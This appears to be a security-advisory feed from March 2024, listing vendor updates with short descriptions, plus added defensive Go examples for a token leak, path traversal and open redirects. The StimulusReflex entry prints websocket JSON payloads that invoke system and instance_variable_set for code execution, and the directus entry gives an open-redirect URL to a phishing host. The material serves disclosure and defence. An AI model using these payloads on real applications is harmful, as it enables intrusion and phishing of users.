08.03.2024 10:31:37 | suse | [SUSE-SU-2024:0813-1] Security update for openssl-1_1 (moderate)
Security update for openssl-1_1
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0813-1

08.03.2024 09:43:32 | suse | [SUSE-SU-2024:0812-1] Security update for go1.22 (important)
Security update for go1.22
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0812-1

08.03.2024 09:43:13 | suse | [SUSE-SU-2024:0811-1] Security update for go1.21 (important)
Security update for go1.21
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0811-1

08.03.2024 03:01:36 | ubuntu | [USN-6680-2] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6680-2

08.03.2024 02:30:45 | ubuntu | [USN-6686-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-1

08.03.2024 02:00:00 | debian | [DSA-5637-1] squid (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5637-1

08.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1239] opencryptoki security update (moderate)
[3.21.0-9]
- timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin) Resolves: RHEL-22792
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1239

08.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1075] edk2 security update (important)
[20230524-4.el9_3.2]
- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45230-Pa.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Add-Unit-tests-to-CI-and-create-Host-Test.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45230-Un.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45229-Pa.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45229-Un.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45231-Patc.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45231-Unit.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45232-Patc.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45232-Unit.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523p2.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523p3.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523p4.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Adds-a-SecurityFix.yaml-file.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45229-Re.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Dhcp6Dxe-Removes-duplicate-check-and-repl.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Dhcp6Dxe-Packet-Length-is-not-updated-bef.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- edk2-NetworkPkg-Updating-SecurityFixes.yaml.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]
- Resolves: RHEL-21841 (CVE-2023-45229 edk2: Integer underflow when processing IA_NA/IA_TA options in a DHCPv6 Advertise message [rhel-9])
- Resolves: RHEL-21843 (CVE-2023-45230 edk2: Buffer overflow in the DHCPv6 client via a long Server ID option [rhel-9])
- Resolves: RHEL-21845 (CVE-2023-45231 edk2: Out of Bounds read when handling a ND Redirect message with truncated options [rhel-9])
- Resolves: RHEL-21847 (CVE-2023-45232 edk2: Infinite loop when parsing unknown options in the Destination Options header [rhel-9])
- Resolves: RHEL-21849 (TRIAGE CVE-2023-45233 edk2: Infinite loop when parsing a PadN option in the Destination Options header [rhel-9])
- Resolves: RHEL-21851 (CVE-2023-45234 edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message [rhel-9])
- Resolves: RHEL-21853 (TRIAGE CVE-2023-45235 edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message [rhel-9])
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1075

10.03.2024 02:00:00debian[DSA-5638-1] libuv1 (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5638-1
09.03.2024 02:00:00freebsd[FREEBSD:C2AD8700-DE25-11EE-9190-84A93843EB75] Unbound -- Denial-of-Service vulnerability (high)NLNet Labs reports: Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C2AD8700-DE25-11EE-9190-84A93843EB75
11.03.2024 22:25:12ubuntu[USN-6681-2] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-2
11.03.2024 22:17:36ubuntu[USN-6688-1] Linux kernel (OEM) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6688-1
11.03.2024 20:25:02ubuntu[USN-6658-2] libxml2 vulnerability (high)libxml2 could be made to crash or run programs if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6658-2
11.03.2024 14:34:46ubuntu[USN-6687-1] AccountsService vulnerability (low)AccountsService could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6687-1
11.03.2024 02:00:00redhat[RHSA-2024:1244] rhc-worker-script security update (moderate)The rhc-worker-script packages provide Remote Host Configuration (rhc) worker for executing an interpreted programming language script on hosts managed by Red Hat Insights.Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1244
10.03.2024 20:32:28go[GO-2024-2618] Authentication token leak in github.com/cloudevents/sdk-go/v2 (high)Using cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints. When the transport is populated with an authenticated transport, http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to any endpoint it is used to contact.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2618
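The mechanism in GO-2024-2618, as an added example that is not code from the advisory or from the cloudevents SDK: a hypothetical `authTransport` stands in for the authenticated `http.RoundTripper`, `newClientLeaky` reproduces the pattern the advisory describes (the transport installed on the process-wide `http.DefaultClient`), and `newClientIsolated` is the corrected form. Two local `httptest` servers, both constructed here, play the trusted endpoint and an unrelated one; `TokenLeaksToUnrelatedHost` reports whether the unrelated server received the bearer token.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"sync"
)

// authTransport is a hypothetical authenticated http.RoundTripper: it stamps
// a bearer token on every request before handing it to the underlying
// transport, as a client library's "authenticated transport" would.
type authTransport struct {
	token string
	base  http.RoundTripper
}

func (t authTransport) RoundTrip(req *http.Request) (*http.Response, error) {
	r := req.Clone(req.Context())
	r.Header.Set("Authorization", "Bearer "+t.token)
	return t.base.RoundTrip(r)
}

// newClientLeaky reproduces the pattern the advisory describes: the
// authenticated transport is installed on the process-wide http.DefaultClient,
// so every later http.Get / http.Post anywhere in the process, to any host,
// carries the token.
func newClientLeaky(rt http.RoundTripper) *http.Client {
	http.DefaultClient.Transport = rt
	return http.DefaultClient
}

// newClientIsolated is the corrected pattern: a dedicated *http.Client owns
// the authenticated transport and http.DefaultClient is left untouched.
func newClientIsolated(rt http.RoundTripper) *http.Client {
	return &http.Client{Transport: rt}
}

// TokenLeaksToUnrelatedHost builds a client with newClient, uses it once
// against a "trusted" local server, then performs a plain http.Get (which goes
// through http.DefaultClient) against an unrelated local server and reports
// whether that unrelated server received an Authorization header.
// Both servers are constructed here with httptest; no external network is used.
func TokenLeaksToUnrelatedHost(newClient func(http.RoundTripper) *http.Client) (bool, error) {
	// Undo any global mutation so one run cannot influence the next.
	defer func() { http.DefaultClient.Transport = nil }()

	trusted := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {}))
	defer trusted.Close()

	var (
		mu      sync.Mutex
		sawAuth bool
	)
	unrelated := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		mu.Lock()
		sawAuth = r.Header.Get("Authorization") != ""
		mu.Unlock()
	}))
	defer unrelated.Close()

	client := newClient(authTransport{token: "s3cret-token", base: http.DefaultTransport})
	resp, err := client.Get(trusted.URL)
	if err != nil {
		return false, err
	}
	resp.Body.Close()

	// Code elsewhere in the same process, unaware of the SDK client, uses the
	// package-level helper to talk to some other endpoint.
	resp, err = http.Get(unrelated.URL)
	if err != nil {
		return false, err
	}
	resp.Body.Close()

	mu.Lock()
	defer mu.Unlock()
	return sawAuth, nil
}

func main() {
	leaky, err := TokenLeaksToUnrelatedHost(newClientLeaky)
	if err != nil {
		panic(err)
	}
	isolated, err := TokenLeaksToUnrelatedHost(newClientIsolated)
	if err != nil {
		panic(err)
	}
	fmt.Println("global DefaultClient.Transport leaks token:", leaky) // true
	fmt.Println("dedicated http.Client leaks token:", isolated)       // false
}
```

The check a practitioner wants from this is the last one: after constructing any third-party client with credentials, `http.DefaultClient.Transport` should still be nil; a library that changes it has turned a per-client secret into a per-process one.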
10.03.2024 20:04:59go[GO-2024-2616] Path traversal and user privilege escalation in github.com/IceWhaleTech/CasaOS-UserService (high)The UserService API contains a path traversal vulnerability that allows an attacker to obtain any file on the system, including the user database and system configuration. This can lead to privilege escalation and compromise of the system.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2616
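The control that GO-2024-2616 is missing, as an added example that is not code from the advisory or from CasaOS: a lexical containment check for a client-supplied file name. `ResolveUnderRoot` and the root directory used in `main` are assumptions of this example; the advisory gives no details of the UserService API itself.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned for any client-supplied path that would resolve
// to a file outside the directory the API is allowed to serve.
var ErrOutsideRoot = errors.New("path escapes the permitted directory")

// ResolveUnderRoot maps an untrusted relative path (for example a file name
// taken from an HTTP request) onto a location below root and refuses anything
// that would land outside it. root must be absolute and cleaned. The check is
// purely lexical: it catches "../" sequences, absolute paths, already-decoded
// variants and NUL bytes, but not symlinks inside root that point outside it.
func ResolveUnderRoot(root, untrusted string) (string, error) {
	if untrusted == "" || strings.ContainsRune(untrusted, 0) {
		return "", ErrOutsideRoot
	}
	// Absolute paths (and Windows-style "\server\share") are never acceptable
	// as a relative selector.
	if filepath.IsAbs(untrusted) || strings.HasPrefix(untrusted, `\`) {
		return "", ErrOutsideRoot
	}
	// Join then Clean, so that the path actually handed to the OS is the one
	// being judged, not the raw input ("a/../../etc/passwd" collapses here).
	full := filepath.Clean(filepath.Join(root, untrusted))
	rel, err := filepath.Rel(root, full)
	if err != nil {
		return "", ErrOutsideRoot
	}
	// rel is now root-relative. A leading ".." component means it escaped;
	// "." would be root itself, a directory rather than a file. A name that
	// merely starts with ".." (such as "..alice") is legitimate and kept.
	sep := string(filepath.Separator)
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+sep) {
		return "", ErrOutsideRoot
	}
	return full, nil
}

func main() {
	// Hypothetical served directory for the demonstration.
	root := filepath.Join(string(filepath.Separator), "srv", "userservice", "files")
	for _, p := range []string{
		"avatars/alice.png",    // ordinary request
		"avatars/../alice.png", // harmless ".." that stays inside root
		"../../etc/passwd",     // classic traversal
		"/etc/passwd",          // absolute path smuggled as a name
		"..alice/notes.txt",    // legitimate name that merely starts with ".."
	} {
		got, err := ResolveUnderRoot(root, p)
		fmt.Printf("%-24q -> %q %v\n", p, got, err)
	}
}
```

If root can contain symlinks, resolve the returned path with `filepath.EvalSymlinks` and run the same containment check on the result before opening it; a lexical check alone says nothing about where a link points.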
10.03.2024 19:17:33go[GO-2024-2605] SQL injection in github.com/jackc/pgx/v4 (high)SQL injection is possible when the database uses the non-default simple protocol, a minus sign directly precedes a numeric placeholder followed by a string placeholder on the same line, and both parameter values are user-controlled.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2605
11.03.2024 13:17:25almalinux[ALSA-2024:1239] opencryptoki security update (moderate)opencryptoki security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1239
12.03.2024 22:50:48npm[NPM:GHSA-FR3W-2P22-6W7P] URL Redirection to Untrusted Site in OAuth2/OpenID in directus (moderate)
### Summary
The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL https://docs.directus.io/reference/authentication.html#login-using-sso-providers /auth/login/google?redirect for example.
### Details
There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`, which I think is here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L394. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like an error message "Your password needs to be updated" to phish out the current password.
### PoC
Turn on any auth provider in Directus instance. Form a link to `directus-instance/auth/login/:provider_id?redirect=http://malicious-fishing-site.com`, login and get taken to malicious-site. Tested on the `ory` OAuth2 integration.
### Impact
Users who login via OAuth2 into Directus.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FR3W-2P22-6W7P
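A validator for a post-login `redirect` parameter of the kind described in GHSA-FR3W-2P22-6W7P, as an added example that is not code from the advisory or from Directus (which is not written in Go; the example shows the check, not Directus's fix). `SafeRedirectTarget` is this example's own function; the hostname in `main` is the one from the advisory's PoC. It goes a little beyond the PoC: besides the plain `http://` case it also rejects the protocol-relative, backslash and percent-encoded spellings that browsers treat as another origin.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// SafeRedirectTarget validates a post-login redirect parameter. It returns a
// path on the current origin (path, query and fragment only) when raw is
// acceptable, and fallback otherwise. Everything that could steer the browser
// to another host is rejected: absolute URLs, scheme-only forms such as
// "javascript:", userinfo, protocol-relative "//host" and "/\host" (which
// browsers also treat as protocol-relative), and percent-encoded variants.
func SafeRedirectTarget(raw, fallback string) string {
	u, err := url.Parse(raw)
	if err != nil {
		return fallback // control characters, malformed escapes, ...
	}
	if u.Scheme != "" || u.Host != "" || u.Opaque != "" || u.User != nil {
		return fallback
	}
	p := u.Path // already percent-decoded, so "/%2F%2Fhost" shows up here as "//host"
	if !strings.HasPrefix(p, "/") || strings.HasPrefix(p, "//") || strings.HasPrefix(p, `/\`) {
		return fallback
	}
	// Rebuild from the validated components only; nothing else from the
	// original string survives into the Location header.
	safe := url.URL{Path: p, RawQuery: u.RawQuery, Fragment: u.Fragment}
	return safe.String()
}

func main() {
	for _, raw := range []string{
		"/admin/content?tab=files",
		"http://malicious-fishing-site.com",
		"//malicious-fishing-site.com/login",
		`/\malicious-fishing-site.com`,
		"/%2F%2Fmalicious-fishing-site.com",
		"javascript:alert(1)",
	} {
		fmt.Printf("%-40q -> %q\n", raw, SafeRedirectTarget(raw, "/"))
	}
}
```

Where a product legitimately has to redirect to other hosts after SSO, the right shape is an explicit allow-list compared against the parsed `u.Host`, never a check on the raw string.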
12.03.2024 22:47:19npm[NPM:GHSA-2CCR-G2RV-H677] Session Token in URL in directus (low)
### Impact
When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user.
### Patches
_Has the problem been patched? What versions should users upgrade to?_
### Workarounds
There's no workaround available.
### References
_Are there any links users can visit to find out more?_
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2CCR-G2RV-H677
12.03.2024 20:42:27ubuntu[USN-6693-1] .NET vulnerability (high).NET could be made to crash if it processed specially crafted requests.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6693-1
12.03.2024 18:44:00xen[XSA-452] x86: Register File Data Sampling
**ISSUE DESCRIPTION**
Intel have disclosed RFDS, Register File Data Sampling, affecting some Atom cores.
This came from internal validation work. There is no information provided about how an attacker might go about inferring data from the register files.
For more details, see: https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.html
**IMPACT**
An attacker might be able to infer the contents of data held previously in floating point, vector and/or integer register files on the same logical processor, including data from a more privileged context.
Note: None of the vulnerable processors support HyperThreading, so there is no instantaneous exposure of data from other threads.
**VULNERABLE SYSTEMS**
Systems running all versions of Xen are affected.
RFDS is only known to affect certain Atom processors from Intel. Other Intel CPUs, and CPUs from other hardware vendors are not known to be affected.
RFDS affects Atom processors between the Goldmont and Gracemont microarchitectures. This includes Alder Lake and Raptor Lake hybrid client systems which have a mix of Gracemont and other types of cores.
https://secdb.nttzen.cloud/security-advisory/xen/XSA-452
12.03.2024 18:44:00xen[XSA-453] GhostRace: Speculative Race Conditions
**ISSUE DESCRIPTION**
Researchers at VU Amsterdam and IBM Research have discovered GhostRace; an analysis of the behaviour of synchronisation primitives under speculative execution.
Synchronisation primitives are typically formed as an unbounded loop which waits until a resource is available to be accessed. This means there is a conditional branch which can be microarchitecturally bypassed using Spectre-v1 techniques, allowing an attacker to speculatively execute critical regions.
Therefore, while a critical region might be safe architecturally, it can still suffer from data races under speculation with unsafe consequences.
The GhostRace paper focuses on Speculative Concurrent Use-After-Free issues, but notes that there are many other types of speculative data hazard to be explored.
For more details, see: https://vusec.net/projects/ghostrace
**IMPACT**
An attacker might be able to infer the contents of arbitrary host memory, including memory assigned to other guests.
**VULNERABLE SYSTEMS**
Systems running all versions of Xen are affected.
GhostRace is a variation of Spectre-v1, and Spectre-v1 is known to affect a wide range of CPU architectures and designs. Consult your hardware vendor.
However, Xen does not have any known gadgets vulnerable to GhostRace at the time of writing.
Furthermore, even with the vulnerable instance found in Linux, the researchers had to insert an artificial syscall to make the instance more accessible to a userspace attacker.
Therefore, the Xen Security Team does not believe that immediate action is required.
https://secdb.nttzen.cloud/security-advisory/xen/XSA-453
12.03.2024 17:54:06ubuntu[USN-6692-1] Gson vulnerability (high)Gson could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6692-1
12.03.2024 17:44:51npm[NPM:GHSA-F78J-4W3G-4Q65] StimulusReflex arbitrary method call (high)
### Summary
More methods than expected can be called on reflex instances. Being able to call some of them has security implications.

### Details
To invoke a reflex a websocket message of the following shape is sent:
```json
{ "target": "[class_name]#[method_name]", "args": [] }
```
The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`.
It then attempts to call `method_name` on the instance with the provided arguments [ref](https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83):
```ruby
method = reflex.method method_name
required_params = method.parameters.select { |(kind, _)| kind == :req }
optional_params = method.parameters.select { |(kind, _)| kind == :opt }

if arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size
  reflex.public_send(method_name, *arguments)
end
```
This is problematic as `reflex.method(method_name)` can be more methods than those explicitly specified by the developer in their reflex class. A good example is the `instance_variable_set` method.

<details><summary>Read more</summary>
Let's imagine a reflex that uses `@user` as a trusted variable in an `after_reflex` callback.
This variable can be overwritten using the following message:
```json
{ "target": "ChatReflex#instance_variable_set", "args": ["@user", "<admin-id>"] }
```
Here are other interesting methods that were found to be available for the [ChatReflex sample reflex](https://github.com/hopsoft/stimulus_reflex_expo/blob/dcce8c36a6782d1e7f57f0e2766a3f6fd770b3b1/app/reflexes/chat_reflex.rb):
- `remote_byebug`: bind a debugging server
- `pry`: drop the process in a REPL session

All in all, only counting `:req` and `:opt` parameters helps.
For example around [version 1.0](https://github.com/stimulusreflex/stimulus_reflex/blob/1f610b636abfed27de2c61104aebd1ac98180d5b/lib/stimulus_reflex/channel.rb#L41) only `.arity` was checked which allowed access to the `system` method (`.arity == -1`):
```json
{ "target": "ChatReflex#system", "args": ["[command here]"] }
```
Using `public_send` instead of `send` does not help but the following payloads **do not** work since `:rest` parameters are not counted in the current version:
```json
{ "target": "ChatReflex#send", "args": ["system", "[command here]"] }
```
```json
{ "target": "ChatReflex#instance_eval", "args": ["system('[command here]')"] }
```
</details>

Pre-versions of 3.5.0 added a `render_collection` method on reflexes with a `:req` parameter. Calling this method could lead to arbitrary code execution:
```json
{ "target": "StimulusReflex::Reflex#render_collection", "args": [ { "inline": "<% system('[command here]') %>" } ] }
```

### Patches
Patches are [available on RubyGems](https://rubygems.org/gems/stimulus_reflex) and on [NPM](https://npmjs.org/package/stimulus_reflex). The patched versions are:
- [`3.4.2`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2)
- [`3.5.0.rc4`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4)

### Workaround
You can add this guard to mitigate the issue if running an unpatched version of the library.
1.) Make sure all your reflexes inherit from the `ApplicationReflex` class
2.) Add this `before_reflex` callback to your `app/reflexes/application_reflex.rb` file:
```ruby
class ApplicationReflex < StimulusReflex::Reflex
  before_reflex do
    ancestors = self.class.ancestors[0..self.class.ancestors.index(StimulusReflex::Reflex) - 1]
    allowed = ancestors.any? { |a| a.public_instance_methods(false).any?(method_name.to_sym) }
    raise ArgumentError.new("Reflex method '#{method_name}' is not defined on class '#{self.class.name}' or on any of its ancestors") if !allowed
  end
end
```
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F78J-4W3G-4Q65
12.03.2024 16:18:08ubuntu[USN-6691-1] OVN vulnerability (medium)OVN could be made to disrupt traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6691-1
12.03.2024 13:34:51ubuntu[USN-6690-1] Open vSwitch vulnerabilities (high)Several security issues were fixed in Open vSwitch.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6690-1
12.03.2024 12:38:40ubuntu[USN-6656-2] PostgreSQL vulnerability (high)PostgreSQL could be made to run arbitrary SQL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6656-2
12.03.2024 12:22:55ubuntu[USN-6689-1] Rack vulnerabilities (medium)Rack could be made to deny service if it received a specially crafted header.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6689-1
12.03.2024 09:00:00msrc[MS:CVE-2024-20671] Microsoft Defender Security Feature Bypass Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20671
12.03.2024 09:00:00msrc[MS:CVE-2024-21392] .NET and Visual Studio Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21392
12.03.2024 09:00:00msrc[MS:CVE-2024-21411] Skype for Consumer Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21411
12.03.2024 09:00:00msrc[MS:CVE-2024-21418] Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21418
12.03.2024 09:00:00msrc[MS:CVE-2024-21421] Azure SDK Spoofing Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21421
12.03.2024 09:00:00msrc[MS:CVE-2024-21426] Microsoft SharePoint Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21426
12.03.2024 09:00:00msrc[MS:CVE-2024-21429] Windows USB Hub Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21429
12.03.2024 09:00:00msrc[MS:CVE-2024-21430] Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21430
12.03.2024 09:00:00msrc[MS:CVE-2024-21438] Microsoft AllJoyn API Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21438
12.03.2024 09:00:00msrc[MS:CVE-2024-21439] Windows Telephony Server Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21439
12.03.2024 09:00:00msrc[MS:CVE-2024-21441] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21441
12.03.2024 09:00:00msrc[MS:CVE-2024-21442] Windows USB Print Driver Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21442
12.03.2024 09:00:00msrc[MS:CVE-2024-21443] Windows Kernel Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21443
12.03.2024 09:00:00msrc[MS:CVE-2024-21444] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21444
12.03.2024 09:00:00msrc[MS:CVE-2024-21445] Windows USB Print Driver Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21445
12.03.2024 09:00:00msrc[MS:CVE-2024-21446] NTFS Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21446
12.03.2024 09:00:00msrc[MS:CVE-2024-21450] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21450
12.03.2024 09:00:00msrc[MS:CVE-2024-21451] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21451
12.03.2024 09:00:00msrc[MS:CVE-2024-26197] Windows Standards-Based Storage Management Service Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26197
12.03.2024 09:00:00msrc[MS:CVE-2024-26159] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26159
12.03.2024 09:00:00msrc[MS:CVE-2024-26190] Microsoft QUIC Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26190
12.03.2024 09:00:00msrc[MS:CVE-2024-26198] Microsoft Exchange Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26198
12.03.2024 09:00:00msrc[MS:CVE-2024-26199] Microsoft Office Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26199
12.03.2024 09:00:00msrc[MS:CVE-2024-26201] Microsoft Intune Linux Agent Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26201
12.03.2024 09:00:00msrc[MS:CVE-2024-26203] Azure Data Studio Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26203
12.03.2024 09:00:00msrc[MS:CVE-2024-26161] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26161
